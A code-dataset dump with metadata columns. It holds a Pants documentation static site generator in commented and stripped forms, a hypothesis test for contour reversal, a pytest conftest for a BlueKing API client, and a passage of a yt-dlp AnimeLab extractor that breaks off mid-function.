] | 1 | 2018-03-08T22:21:44.000Z | 2018-03-08T22:21:44.000Z | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import collections
import json
import os
import re
import shutil
from datetime import datetime
from pystache import Renderer
from six.moves import range
from pants.backend.docgen.tasks.generate_pants_reference import GeneratePantsReference
from pants.backend.docgen.tasks.markdown_to_html import MarkdownToHtml
from pants.base.exceptions import TaskError
from pants.task.task import Task
"""Static Site Generator for the Pants Build documentation site.
Suggested use:
cd pants
./build-support/bin/publish_docs.sh # invokes sitegen.py
"""
def beautiful_soup(*args, **kwargs):
  """Constructs a BeautifulSoup, importing bs4 lazily.

  bs4 is an expensive import (it invokes re.compile a lot), so we defer
  that cost until a soup is actually needed.
  """
  from bs4 import BeautifulSoup  # Local import keeps module load cheap.
  return BeautifulSoup(*args, **kwargs)
class SiteGen(Task):
"""Generate the Pants static web site."""
@classmethod
def register_options(cls, register):
super(SiteGen, cls).register_options(register)
register('--config-path', type=list, help='Path to .json file describing site structure.')
# FIXME(cosmicexplorer): requiring these products ensures that the markdown
# and reference tasks run before this one, but we don't use those
# products.
@classmethod
def prepare(cls, options, round_manager):
round_manager.require(MarkdownToHtml.MARKDOWN_HTML_PRODUCT)
round_manager.require_data(GeneratePantsReference.PANTS_REFERENCE_PRODUCT)
round_manager.require_data(GeneratePantsReference.BUILD_DICTIONARY_PRODUCT)
def execute(self):
if not self.get_options().config_path:
raise TaskError('The config_path option must be specified, e.g., with the --config-path flag')
for config_path in self.get_options().config_path:
config = load_config(config_path)
soups = load_soups(config)
precomputed = precompute(config, soups)
transform_soups(config, soups, precomputed)
template = load_template(config)
write_en_pages(config, soups, precomputed, template)
copy_extras(config)
def load_config(json_path):
  """Load site-structure config info from a .json file and return it.

  :param json_path: path to the JSON config file (UTF-8 encoded).
  :returns: the parsed config dict.
  :raises ValueError: if the config's tree does not start with the 'index' page.
  """
  # Read bytes and decode explicitly: works on both Python 2 and 3.
  # (Text-mode read() already yields unicode on Python 3, which has no
  # .decode, so the previous text-mode open + decode broke there.)
  with open(json_path, 'rb') as json_file:
    config = json.loads(json_file.read().decode('utf8'))
  # Sanity-test the config with a real exception (assert vanishes under -O).
  if config['tree'][0]['page'] != 'index':
    raise ValueError('Config tree must start with the "index" page: {0}'
                     .format(json_path))
  return config
def load_soups(config):
"""Generate BeautifulSoup AST for each page listed in config."""
soups = {}
for page, path in config['sources'].items():
with open(path, 'rb') as orig_file:
soups[page] = beautiful_soup(orig_file.read().decode('utf-8'))
return soups
class Precomputed(object):
  """Info we compute (and preserve) before we mutate things.

  :ivar page: dict of per-page precomputed info, keyed by page name.
  :ivar pantsref: dict mapping pantsref names to destinations, e.g.
    {'foo': 'path/to/page.html#fooref', ...}
  """

  def __init__(self, page, pantsref):
    self.page = page
    self.pantsref = pantsref
class PrecomputedPageInfo(object):
  """Per-page info computed (and preserved) before soups are mutated."""

  def __init__(self, title, show_toc):
    """
    :param title: page title.
    :param show_toc: True iff a table of contents should be shown.
    """
    self.title = title
    self.show_toc = show_toc
    self.toc = []  # Populated later, once headings are linkable.
def precompute_pantsrefs(soups):
"""Return links for <a pantsmark="foo"> tags. Mutates soups to give needed ids.
If we see <a pantsref="foo">something</a>, that's a link whose destination is
a <a pantsmark="foo"> </a> tag, perhaps on some other tag. To stitch these
together, we scan the docset to find all the pantsmarks. If an pantsmark does not
yet have an id to anchor, we give it one.
Return value dictionary maps pantsrefs to locations:
{ "foo": "path/to/foo.html#fooref", "bar": "other/page.html#barref", ...}
"""
accumulator = {}
for (page, soup) in soups.items():
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all('a'):
if tag.has_attr('pantsmark'):
pantsmark = tag['pantsmark']
if pantsmark in accumulator:
raise TaskError('pantsmarks are unique but "{0}" appears in {1} and {2}'
.format(pantsmark, page, accumulator[pantsmark]))
# To link to a place "mid-page", we need an HTML anchor.
# If this tag already has such an anchor, use it.
# Else, make one up.
anchor = tag.get('id') or tag.get('name')
if not anchor:
anchor = pantsmark
while anchor in existing_anchors:
count += 1
anchor = '{0}_{1}'.format(pantsmark, count)
tag['id'] = anchor
existing_anchors = find_existing_anchors(soup)
link = '{0}.html#{1}'.format(page, anchor)
accumulator[pantsmark] = link
return accumulator
def precompute(config, soups):
"""Return info we want to compute (and preserve) before we mutate things."""
show_toc = config.get('show_toc', {})
page = {}
pantsrefs = precompute_pantsrefs(soups)
for p, soup in soups.items():
title = get_title(soup) or p
page[p] = PrecomputedPageInfo(title=title, show_toc=show_toc.get(p, True))
return Precomputed(page=page, pantsref=pantsrefs)
def fixup_internal_links(config, soups):
"""Find href="..." links that link to pages in our docset; fix them up.
We don't preserve relative paths between files as we copy-transform them
from source to dest. So adjust the paths to work with new locations.
"""
# Pages can come from different dirs; they can go to different dirs.
# Thus, there's some relative-path-computing here.
reverse_directory = {}
for d, s in config['sources'].items():
reverse_directory[s] = d
for name, soup in soups.items():
old_src_dir = os.path.dirname(config['sources'][name])
for tag in soup.find_all(True):
if not 'href' in tag.attrs: continue
old_rel_path = tag['href'].split('#')[0]
old_dst = os.path.normpath(os.path.join(old_src_dir, old_rel_path))
if not old_dst in reverse_directory: continue
new_dst = reverse_directory[old_dst] + '.html'
new_rel_path = rel_href(name, new_dst)
# string replace instead of assign to not loose anchor in foo.html#anchor
tag['href'] = tag['href'].replace(old_rel_path, new_rel_path, 1)
_heading_re = re.compile('^h[1-6]$') # match heading tag names h1,h2,h3,...
def rel_href(src, dst):
  """Returns dst as a link relative to src's directory.

  E.g. src='foo/bar.html', dst='garply.html#frotz' gives
  '../garply.html#frotz'.
  """
  return os.path.relpath(dst, os.path.dirname(src))
def find_existing_anchors(soup):
"""Return existing ids (and names) from a soup."""
existing_anchors = set()
for tag in soup.find_all(True):
for attr in ['id', 'name']:
if tag.has_attr(attr):
existing_anchors.add(tag.get(attr))
return existing_anchors
def ensure_headings_linkable(soups):
"""foreach soup, foreach h1,h2,etc, if no id=... or name=..., give it one.
Enables tables of contents.
"""
for soup in soups.values():
ensure_page_headings_linkable(soup)
def ensure_page_headings_linkable(soup):
# To avoid re-assigning an existing id, note 'em down.
# Case-insensitve because distinguishing links #Foo and #foo would be weird.
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all(_heading_re):
if not (tag.has_attr('id') or tag.has_attr('name')):
snippet = ''.join([c for c in tag.text if c.isalpha()])[:20]
while True:
count += 1
candidate_id = 'heading_{0}_{1}'.format(snippet, count).lower()
if not candidate_id in existing_anchors:
existing_anchors.add(candidate_id)
tag['id'] = candidate_id
break
def link_pantsrefs(soups, precomputed):
"""Transorm soups: <a pantsref="foo"> becomes <a href="../foo_page.html#foo">"""
for (page, soup) in soups.items():
for a in soup.find_all('a'):
if a.has_attr('pantsref'):
pantsref = a['pantsref']
if not pantsref in precomputed.pantsref:
raise TaskError('Page {0} has pantsref "{1}" and I cannot find pantsmark for'
' it'.format(page, pantsref))
a['href'] = rel_href(page, precomputed.pantsref[pantsref])
def transform_soups(config, soups, precomputed):
"""Mutate our soups to be better when we write them out later."""
fixup_internal_links(config, soups)
ensure_headings_linkable(soups)
# Do this after ensure_headings_linkable so that there will be links.
generate_page_tocs(soups, precomputed)
link_pantsrefs(soups, precomputed)
def get_title(soup):
  """Picks a title out of a soup: <title> first, then first <h1>, else ''."""
  for candidate in (soup.title, soup.h1):
    if candidate:
      return candidate.string
  return ''
def generate_site_toc(config, precomputed, here):
  """Returns site-level TOC template data for the page `here`.

  Walks config['tree'] depth-first; each node may contribute a heading
  entry, a flat list of page links, and/or a collapsible group of links.

  :param config: site config dict (uses its 'tree' entry).
  :param precomputed: Precomputed info (used for page titles).
  :param here: name of the page being rendered; its link is emitted as the
    bare filename and marked `here`; other links are relative to its dir.
  """
  site_toc = []

  def page_links(pages):
    """Builds link dicts for `pages`; returns (links, whether `here` is among them)."""
    links = []
    contains_here = False
    for cur_page in pages:
      html_filename = '{}.html'.format(cur_page)
      page_is_here = cur_page == here
      if page_is_here:
        link = html_filename
        contains_here = True
      else:
        link = os.path.relpath(html_filename, os.path.dirname(here))
      links.append(dict(link=link, text=precomputed.page[cur_page].title,
                        here=page_is_here))
    return links, contains_here

  def recurse(tree, depth_so_far):
    for node in tree:
      # Look the heading up on *this* node. The previous code reused the
      # `heading` variable from an earlier branch/node, which was stale
      # (or a NameError) for heading-less page lists.
      heading = node.get('heading')
      heading_id = (heading or '').replace(' ', '-')
      if 'collapsible_heading' in node and 'pages' in node:
        collapsible = node['collapsible_heading']
        links, collapse_open = page_links(node['pages'])
        site_toc.append(dict(depth=depth_so_far, links=links, dropdown=True,
                             heading=collapsible,
                             id=collapsible.replace(' ', '-'),
                             open=collapse_open))
      if heading is not None:
        site_toc.append(dict(depth=depth_so_far, links=None, dropdown=False,
                             heading=heading, id=heading_id))
      if 'pages' in node and not 'collapsible_heading' in node:
        links, _ = page_links(node['pages'])
        site_toc.append(dict(depth=depth_so_far, links=links, dropdown=False,
                             heading=None, id=heading_id))
      if 'children' in node:
        recurse(node['children'], depth_so_far + 1)

  if 'tree' in config:
    recurse(config['tree'], 0)
  return site_toc
def hdepth(tag):
"""Compute an h tag's "outline depth".
E.g., h1 at top level is 1, h1 in a section is 2, h2 at top level is 2.
"""
if not _heading_re.search(tag.name):
raise TaskError('Can\'t compute heading depth of non-heading {0}'.format(tag))
depth = int(tag.name[1], 10) # get the 2 from 'h2'
cursor = tag
while cursor:
if cursor.name == 'section':
depth += 1
cursor = cursor.parent
return depth
def generate_page_tocs(soups, precomputed):
for name, soup in soups.items():
if precomputed.page[name].show_toc:
precomputed.page[name].toc = generate_page_toc(soup)
def generate_page_toc(soup):
"""Return page-level (~list of headings) TOC template data for soup"""
# Maybe we don't want to show all the headings. E.g., it's common for a page
# to have just one H1, a title at the top. Our heuristic: if a page has just
# one heading of some outline level, don't show it.
found_depth_counts = collections.defaultdict(int)
for tag in soup.find_all(_heading_re):
if (tag.get('id') or tag.get('name')):
found_depth_counts[hdepth(tag)] += 1
depth_list = [i for i in range(100) if 1 < found_depth_counts[i]]
depth_list = depth_list[:4]
toc = []
for tag in soup.find_all(_heading_re):
depth = hdepth(tag)
if depth in depth_list:
toc.append(dict(depth=depth_list.index(depth) + 1,
link=tag.get('id') or tag.get('name'),
text=tag.text))
return toc
def generate_generated(config, here):
  """Returns a "<source path> <timestamp>" provenance string for page `here`."""
  source_path = config['sources'][here]
  timestamp = datetime.now().isoformat()
  return '{0} {1}'.format(source_path, timestamp)
def render_html(dst, config, soups, precomputed, template):
soup = soups[dst]
renderer = Renderer()
title = precomputed.page[dst].title
topdots = ('../' * dst.count('/'))
if soup.body:
body_html = '{0}'.format(soup.body)
else:
body_html = '{0}'.format(soup)
html = renderer.render(template,
body_html=body_html,
generated=generate_generated(config, dst),
site_toc=generate_site_toc(config, precomputed, dst),
has_page_toc=bool(precomputed.page[dst].toc),
page_path=dst,
page_toc=precomputed.page[dst].toc,
title=title,
topdots=topdots)
return html
def write_en_pages(config, soups, precomputed, template):
outdir = config['outdir']
for dst in soups:
html = render_html(dst, config, soups, precomputed, template)
dst_path = os.path.join(outdir, dst + '.html')
dst_dir = os.path.dirname(dst_path)
if not os.path.isdir(dst_dir):
os.makedirs(dst_dir)
with open(dst_path, 'wb') as f:
f.write(html.encode('utf-8'))
def copy_extras(config):
  """Copies "extra" files named in the config (stylesheets, logos, ...).

  Each entry of config['extras'] maps a destination path (relative to
  config['outdir']) to a source path; parent directories are created as
  needed.
  """
  outdir = config['outdir']
  for relative_dst, src in config['extras'].items():
    dst_path = os.path.join(outdir, relative_dst)
    parent = os.path.dirname(dst_path)
    if not os.path.isdir(parent):
      os.makedirs(parent)
    shutil.copy(src, dst_path)
def load_template(config):
  """Returns the text of the template file named by config['template'].

  The file is read as bytes and decoded as UTF-8.
  """
  with open(config['template'], 'rb') as template_file:
    return template_file.read().decode('utf-8')
| 35.240099 | 144 | 0.667416 |
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import collections
import json
import os
import re
import shutil
from datetime import datetime
from pystache import Renderer
from six.moves import range
from pants.backend.docgen.tasks.generate_pants_reference import GeneratePantsReference
from pants.backend.docgen.tasks.markdown_to_html import MarkdownToHtml
from pants.base.exceptions import TaskError
from pants.task.task import Task
def beautiful_soup(*args, **kwargs):
import bs4
return bs4.BeautifulSoup(*args, **kwargs)
class SiteGen(Task):
@classmethod
def register_options(cls, register):
super(SiteGen, cls).register_options(register)
register('--config-path', type=list, help='Path to .json file describing site structure.')
# products.
@classmethod
def prepare(cls, options, round_manager):
round_manager.require(MarkdownToHtml.MARKDOWN_HTML_PRODUCT)
round_manager.require_data(GeneratePantsReference.PANTS_REFERENCE_PRODUCT)
round_manager.require_data(GeneratePantsReference.BUILD_DICTIONARY_PRODUCT)
def execute(self):
if not self.get_options().config_path:
raise TaskError('The config_path option must be specified, e.g., with the --config-path flag')
for config_path in self.get_options().config_path:
config = load_config(config_path)
soups = load_soups(config)
precomputed = precompute(config, soups)
transform_soups(config, soups, precomputed)
template = load_template(config)
write_en_pages(config, soups, precomputed, template)
copy_extras(config)
def load_config(json_path):
with open(json_path) as json_file:
config = json.loads(json_file.read().decode('utf8'))
# sanity-test the config:
assert(config['tree'][0]['page'] == 'index')
return config
def load_soups(config):
soups = {}
for page, path in config['sources'].items():
with open(path, 'rb') as orig_file:
soups[page] = beautiful_soup(orig_file.read().decode('utf-8'))
return soups
class Precomputed(object):
def __init__(self, page, pantsref):
self.page = page
self.pantsref = pantsref
class PrecomputedPageInfo(object):
def __init__(self, title, show_toc):
self.title = title
self.show_toc = show_toc
self.toc = []
def precompute_pantsrefs(soups):
accumulator = {}
for (page, soup) in soups.items():
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all('a'):
if tag.has_attr('pantsmark'):
pantsmark = tag['pantsmark']
if pantsmark in accumulator:
raise TaskError('pantsmarks are unique but "{0}" appears in {1} and {2}'
.format(pantsmark, page, accumulator[pantsmark]))
# To link to a place "mid-page", we need an HTML anchor.
# If this tag already has such an anchor, use it.
# Else, make one up.
anchor = tag.get('id') or tag.get('name')
if not anchor:
anchor = pantsmark
while anchor in existing_anchors:
count += 1
anchor = '{0}_{1}'.format(pantsmark, count)
tag['id'] = anchor
existing_anchors = find_existing_anchors(soup)
link = '{0}.html
accumulator[pantsmark] = link
return accumulator
def precompute(config, soups):
show_toc = config.get('show_toc', {})
page = {}
pantsrefs = precompute_pantsrefs(soups)
for p, soup in soups.items():
title = get_title(soup) or p
page[p] = PrecomputedPageInfo(title=title, show_toc=show_toc.get(p, True))
return Precomputed(page=page, pantsref=pantsrefs)
def fixup_internal_links(config, soups):
# Pages can come from different dirs; they can go to different dirs.
# Thus, there's some relative-path-computing here.
reverse_directory = {}
for d, s in config['sources'].items():
reverse_directory[s] = d
for name, soup in soups.items():
old_src_dir = os.path.dirname(config['sources'][name])
for tag in soup.find_all(True):
if not 'href' in tag.attrs: continue
old_rel_path = tag['href'].split('#')[0]
old_dst = os.path.normpath(os.path.join(old_src_dir, old_rel_path))
if not old_dst in reverse_directory: continue
new_dst = reverse_directory[old_dst] + '.html'
new_rel_path = rel_href(name, new_dst)
tag['href'] = tag['href'].replace(old_rel_path, new_rel_path, 1)
_heading_re = re.compile('^h[1-6]$')
def rel_href(src, dst):
src_dir = os.path.dirname(src)
return os.path.relpath(dst, src_dir)
def find_existing_anchors(soup):
existing_anchors = set()
for tag in soup.find_all(True):
for attr in ['id', 'name']:
if tag.has_attr(attr):
existing_anchors.add(tag.get(attr))
return existing_anchors
def ensure_headings_linkable(soups):
for soup in soups.values():
ensure_page_headings_linkable(soup)
def ensure_page_headings_linkable(soup):
# Case-insensitve because distinguishing links #Foo and #foo would be weird.
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all(_heading_re):
if not (tag.has_attr('id') or tag.has_attr('name')):
snippet = ''.join([c for c in tag.text if c.isalpha()])[:20]
while True:
count += 1
candidate_id = 'heading_{0}_{1}'.format(snippet, count).lower()
if not candidate_id in existing_anchors:
existing_anchors.add(candidate_id)
tag['id'] = candidate_id
break
def link_pantsrefs(soups, precomputed):
for (page, soup) in soups.items():
for a in soup.find_all('a'):
if a.has_attr('pantsref'):
pantsref = a['pantsref']
if not pantsref in precomputed.pantsref:
raise TaskError('Page {0} has pantsref "{1}" and I cannot find pantsmark for'
' it'.format(page, pantsref))
a['href'] = rel_href(page, precomputed.pantsref[pantsref])
def transform_soups(config, soups, precomputed):
fixup_internal_links(config, soups)
ensure_headings_linkable(soups)
# Do this after ensure_headings_linkable so that there will be links.
generate_page_tocs(soups, precomputed)
link_pantsrefs(soups, precomputed)
def get_title(soup):
if soup.title: return soup.title.string
if soup.h1: return soup.h1.string
return ''
def generate_site_toc(config, precomputed, here):
site_toc = []
def recurse(tree, depth_so_far):
for node in tree:
if 'collapsible_heading' in node and 'pages' in node:
heading = node['collapsible_heading']
pages = node['pages']
links = []
collapse_open = False
for cur_page in pages:
html_filename = '{}.html'.format(cur_page)
page_is_here = cur_page == here
if page_is_here:
link = html_filename
collapse_open = True
else:
link = os.path.relpath(html_filename, os.path.dirname(here))
links.append(dict(link=link, text=precomputed.page[cur_page].title, here=page_is_here))
site_toc.append(dict(depth=depth_so_far, links=links, dropdown=True, heading=heading, id=heading.replace(' ', '-'), open=collapse_open))
if 'heading' in node:
heading = node['heading']
site_toc.append(dict(depth=depth_so_far, links=None, dropdown=False, heading=heading, id=heading.replace(' ', '-')))
if 'pages' in node and not 'collapsible_heading' in node:
pages = node['pages']
links = []
for cur_page in pages:
html_filename = '{}.html'.format(cur_page)
page_is_here = cur_page == here
if page_is_here:
link = html_filename
else:
link = os.path.relpath(html_filename, os.path.dirname(here))
links.append(dict(link=link, text=precomputed.page[cur_page].title, here=page_is_here))
site_toc.append(dict(depth=depth_so_far, links=links, dropdown=False, heading=None, id=heading.replace(' ', '-')))
if 'children' in node:
recurse(node['children'], depth_so_far + 1)
if 'tree' in config:
recurse(config['tree'], 0)
return site_toc
def hdepth(tag):
if not _heading_re.search(tag.name):
raise TaskError('Can\'t compute heading depth of non-heading {0}'.format(tag))
depth = int(tag.name[1], 10)
cursor = tag
while cursor:
if cursor.name == 'section':
depth += 1
cursor = cursor.parent
return depth
def generate_page_tocs(soups, precomputed):
for name, soup in soups.items():
if precomputed.page[name].show_toc:
precomputed.page[name].toc = generate_page_toc(soup)
def generate_page_toc(soup):
found_depth_counts = collections.defaultdict(int)
for tag in soup.find_all(_heading_re):
if (tag.get('id') or tag.get('name')):
found_depth_counts[hdepth(tag)] += 1
depth_list = [i for i in range(100) if 1 < found_depth_counts[i]]
depth_list = depth_list[:4]
toc = []
for tag in soup.find_all(_heading_re):
depth = hdepth(tag)
if depth in depth_list:
toc.append(dict(depth=depth_list.index(depth) + 1,
link=tag.get('id') or tag.get('name'),
text=tag.text))
return toc
def generate_generated(config, here):
return('{0} {1}'.format(config['sources'][here],
datetime.now().isoformat()))
def render_html(dst, config, soups, precomputed, template):
soup = soups[dst]
renderer = Renderer()
title = precomputed.page[dst].title
topdots = ('../' * dst.count('/'))
if soup.body:
body_html = '{0}'.format(soup.body)
else:
body_html = '{0}'.format(soup)
html = renderer.render(template,
body_html=body_html,
generated=generate_generated(config, dst),
site_toc=generate_site_toc(config, precomputed, dst),
has_page_toc=bool(precomputed.page[dst].toc),
page_path=dst,
page_toc=precomputed.page[dst].toc,
title=title,
topdots=topdots)
return html
def write_en_pages(config, soups, precomputed, template):
    """Render every page and write it as UTF-8 HTML under config['outdir']."""
    out_root = config['outdir']
    for page_name in soups:
        rendered = render_html(page_name, config, soups, precomputed, template)
        target = os.path.join(out_root, page_name + '.html')
        target_dir = os.path.dirname(target)
        # Create intermediate directories on demand.
        if not os.path.isdir(target_dir):
            os.makedirs(target_dir)
        with open(target, 'wb') as out_file:
            out_file.write(rendered.encode('utf-8'))
def copy_extras(config):
    """Copy every configured extra asset into the output directory.

    config['extras'] maps a path relative to config['outdir'] onto the
    source file to copy there.
    """
    out_root = config['outdir']
    for relative_dst, src in config['extras'].items():
        destination = os.path.join(out_root, relative_dst)
        parent = os.path.dirname(destination)
        # Create intermediate directories on demand.
        if not os.path.isdir(parent):
            os.makedirs(parent)
        shutil.copy(src, destination)
def load_template(config):
    """Read the configured template file and return its text.

    The file is read as raw bytes and decoded explicitly so the result is
    identical on every platform (no newline translation).
    """
    with open(config['template'], 'rb') as fh:
        raw = fh.read()
    return raw.decode('utf-8')
| true | true |
1c2cc2599266bdbbccd6dcc6f5d4e36a7d6f337b | 498 | py | Python | tests/integration_tests/contours_tests/test_reverse.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 7 | 2020-05-07T08:13:44.000Z | 2021-12-17T07:33:51.000Z | tests/integration_tests/contours_tests/test_reverse.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 17 | 2019-11-29T23:17:26.000Z | 2020-12-20T15:47:17.000Z | tests/integration_tests/contours_tests/test_reverse.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 1 | 2020-12-17T22:44:21.000Z | 2020-12-17T22:44:21.000Z | from typing import Tuple
from hypothesis import given
from tests.bind_tests.hints import BoundContour
from tests.integration_tests.utils import are_bound_ported_contours_equal
from tests.port_tests.hints import PortedContour
from . import strategies
@given(strategies.contours_pairs)
def test_basic(contours_pair: Tuple[BoundContour, PortedContour]) -> None:
    """Reversing must act identically on the bound and ported contours."""
    bound_contour, ported_contour = contours_pair

    bound_contour.reverse()
    ported_contour.reverse()

    assert are_bound_ported_contours_equal(bound_contour, ported_contour)
| 26.210526 | 74 | 0.813253 | from typing import Tuple
from hypothesis import given
from tests.bind_tests.hints import BoundContour
from tests.integration_tests.utils import are_bound_ported_contours_equal
from tests.port_tests.hints import PortedContour
from . import strategies
@given(strategies.contours_pairs)
def test_basic(contours_pair: Tuple[BoundContour, PortedContour]) -> None:
bound, ported = contours_pair
bound.reverse()
ported.reverse()
assert are_bound_ported_contours_equal(bound, ported)
| true | true |
1c2cc40caa7a9f62496b4447c40f1d27ede16221 | 984 | py | Python | sdks/bkapi-client-core/tests/conftest.py | shabbywu/bkpaas-python-sdk | a9422906707429454ff162f7e39a697260a63d6c | [
"MIT"
] | 17 | 2021-08-03T03:15:35.000Z | 2022-03-18T06:10:04.000Z | sdks/bkapi-client-core/tests/conftest.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | 7 | 2021-08-03T07:10:12.000Z | 2022-03-23T04:47:22.000Z | sdks/bkapi-client-core/tests/conftest.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | 9 | 2021-08-03T03:20:36.000Z | 2022-03-08T13:47:50.000Z | # -*- coding: utf-8 -*-
"""
* TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-蓝鲸 PaaS 平台(BlueKing-PaaS) available.
* Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
"""
import os
import pytest
from bkapi_client_core.config import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.django_settings")
@pytest.fixture(autouse=True)
def core_settings():
settings.reset()
return settings
| 41 | 118 | 0.769309 |
import os
import pytest
from bkapi_client_core.config import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.django_settings")
@pytest.fixture(autouse=True)
def core_settings():
settings.reset()
return settings
| true | true |
1c2cc47dddb6be2c5055de2dde433d58cdc9780a | 11,207 | py | Python | yt_dlp/extractor/animelab.py | jeroenj/yt-dlp | 11078c6d571673a0f09e21933f4ad1e6fcc35456 | [
"Unlicense"
] | 1 | 2022-03-26T15:43:50.000Z | 2022-03-26T15:43:50.000Z | yt_dlp/extractor/animelab.py | jeroenj/yt-dlp | 11078c6d571673a0f09e21933f4ad1e6fcc35456 | [
"Unlicense"
] | null | null | null | yt_dlp/extractor/animelab.py | jeroenj/yt-dlp | 11078c6d571673a0f09e21933f4ad1e6fcc35456 | [
"Unlicense"
] | 2 | 2022-01-05T08:23:25.000Z | 2022-03-06T21:33:37.000Z | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
urlencode_postdata,
int_or_none,
str_or_none,
determine_ext,
)
from ..compat import compat_HTTPError
class AnimeLabBaseIE(InfoExtractor):
    """Shared login handling for the AnimeLab extractors."""

    _LOGIN_URL = 'https://www.animelab.com/login'
    _NETRC_MACHINE = 'animelab'
    # Login state is cached on the class so one login covers all extractors.
    _LOGGED_IN = False

    def _is_logged_in(self, login_page=None):
        """Return True once a fetched page confirms an authenticated session."""
        if not self._LOGGED_IN:
            page = login_page or self._download_webpage(
                self._LOGIN_URL, None, 'Downloading login page')
            # A logged-in session's page no longer shows the "Sign In" link.
            AnimeLabBaseIE._LOGGED_IN = 'Sign In' not in page
        return self._LOGGED_IN

    def _perform_login(self, username, password):
        """Log in with the given credentials unless a session already exists."""
        if self._is_logged_in():
            return

        credentials = {
            'email': username,
            'password': password,
        }
        try:
            response = self._download_webpage(
                self._LOGIN_URL, None, 'Logging in', 'Wrong login info',
                data=urlencode_postdata(credentials),
                headers={'Content-Type': 'application/x-www-form-urlencoded'})
        except ExtractorError as exc:
            # A 400 from the login endpoint means the credentials were rejected.
            if isinstance(exc.cause, compat_HTTPError) and exc.cause.code == 400:
                raise ExtractorError('Unable to log in (wrong credentials?)', expected=True)
            raise

        if not self._is_logged_in(response):
            raise ExtractorError('Unable to login (cannot verify if logged in)')

    def _real_initialize(self):
        if not self._is_logged_in():
            self.raise_login_required('Login is required to access any AnimeLab content')
class AnimeLabIE(AnimeLabBaseIE):
    """Extract a single episode from an AnimeLab player page."""

    _VALID_URL = r'https?://(?:www\.)?animelab\.com/player/(?P<id>[^/]+)'

    # the following tests require authentication, but a free account will suffice
    # just set 'usenetrc' to true in test/local_parameters.json if you use a .netrc file
    # or you can set 'username' and 'password' there
    # the tests also select a specific format so that the same video is downloaded
    # regardless of whether the user is premium or not (needs testing on a premium account)
    _TEST = {
        'url': 'https://www.animelab.com/player/fullmetal-alchemist-brotherhood-episode-42',
        'md5': '05bde4b91a5d1ff46ef5b94df05b0f7f',
        'info_dict': {
            'id': '383',
            'ext': 'mp4',
            'display_id': 'fullmetal-alchemist-brotherhood-episode-42',
            'title': 'Fullmetal Alchemist: Brotherhood - Episode 42 - Signs of a Counteroffensive',
            'description': 'md5:103eb61dd0a56d3dfc5dbf748e5e83f4',
            'series': 'Fullmetal Alchemist: Brotherhood',
            'episode': 'Signs of a Counteroffensive',
            'episode_number': 42,
            'duration': 1469,
            'season': 'Season 1',
            'season_number': 1,
            'season_id': '38',
        },
        'params': {
            'format': '[format_id=21711_yeshardsubbed_ja-JP][height=480]',
        },
        'skip': 'All AnimeLab content requires authentication',
    }

    def _real_extract(self, url):
        """Fetch both language variants of the player page and merge their formats.

        Returns a standard info dict for the episode.  Metadata fields
        (title, thumbnails, season, ...) keep the values parsed from the
        last variant fetched; both variants describe the same episode.
        """
        display_id = self._match_id(url)

        # unfortunately we can get different URLs for the same formats
        # e.g. if we are using a "free" account so no dubs available
        # (so _remove_duplicate_formats is not effective)
        # so we use a dictionary as a workaround
        formats = {}
        # The page is fetched twice: the subtitled and the dubbed variant each
        # expose a (possibly overlapping) set of formats.
        for language_option_url in ('https://www.animelab.com/player/%s/subtitles',
                                    'https://www.animelab.com/player/%s/dubbed'):
            actual_url = language_option_url % display_id
            webpage = self._download_webpage(actual_url, display_id, 'Downloading URL ' + actual_url)

            # The playlist metadata is embedded as a JS constructor argument.
            video_collection = self._parse_json(self._search_regex(r'new\s+?AnimeLabApp\.VideoCollection\s*?\((.*?)\);', webpage, 'AnimeLab VideoCollection'), display_id)
            position = int_or_none(self._search_regex(r'playlistPosition\s*?=\s*?(\d+)', webpage, 'Playlist Position'))

            # Entry for the episode this player page points at.
            raw_data = video_collection[position]['videoEntry']

            video_id = str_or_none(raw_data['id'])

            # create a title from many sources (while grabbing other info)
            # TODO use more fallback sources to get some of these
            series = raw_data.get('showTitle')
            video_type = raw_data.get('videoEntryType', {}).get('name')
            episode_number = raw_data.get('episodeNumber')
            episode_name = raw_data.get('name')

            # Compose "<series> - <type> <number> - <name>" only when every part
            # is known; otherwise fall back to the bare episode name.
            title_parts = (series, video_type, episode_number, episode_name)
            if None not in title_parts:
                title = '%s - %s %s - %s' % title_parts
            else:
                title = episode_name

            description = raw_data.get('synopsis') or self._og_search_description(webpage, default=None)

            duration = int_or_none(raw_data.get('duration'))

            # Flatten every image instance of every image into thumbnail dicts.
            thumbnail_data = raw_data.get('images', [])
            thumbnails = []
            for thumbnail in thumbnail_data:
                for instance in thumbnail['imageInstances']:
                    image_data = instance.get('imageInfo', {})
                    thumbnails.append({
                        'id': str_or_none(image_data.get('id')),
                        'url': image_data.get('fullPath'),
                        'width': image_data.get('width'),
                        'height': image_data.get('height'),
                    })

            # 'season' may be present but null, hence the second fallback.
            season_data = raw_data.get('season', {}) or {}
            season = str_or_none(season_data.get('name'))
            season_number = int_or_none(season_data.get('seasonNumber'))
